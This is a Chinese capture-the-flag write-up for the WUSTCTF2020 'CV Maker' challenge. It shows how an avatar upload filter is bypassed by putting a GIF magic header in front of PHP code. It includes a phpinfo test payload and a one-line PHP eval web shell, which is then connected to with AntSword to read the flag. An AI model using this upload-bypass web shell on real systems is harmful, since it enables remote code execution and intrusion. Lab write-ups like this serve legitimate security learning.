Loading

[BUUCTF题解][WUSTCTF2020]CV Maker

### 知识点

文件上传

过程

做题先搜集(扫目录+检查HTTP报文+查看初始页面HTML代码),初始仅页面登录和初测功能可用,成功登录注册后会跳转到profile.php页面(直接访问也行)。

image-20220403153913713

同样直接上传头像以外功能均不可用,尝试直接上传一句话失败。

<?=phpinfo()?>

image-20220403153905595

加个图片的文件头幻数再试试,结果成功了,后缀还保留了.php。

GIF98a
<?=phpinfo()?>

image-20220403154114360

并且会正常作为php文件解析。

image-20220403154157190

那后面的事情就简单了,给一句话加上图片的文件头幻数然后连蚁剑就行。

GIF98a
<?=eval($_POST[cmd])?>

image-20220403154602533

flag在根目录下一个以Flag开头的奇怪文件中。

image-20220403154658886

posted @ 2022-04-03 15:49  Article_kelp  阅读(208)  评论(0编辑  收藏  举报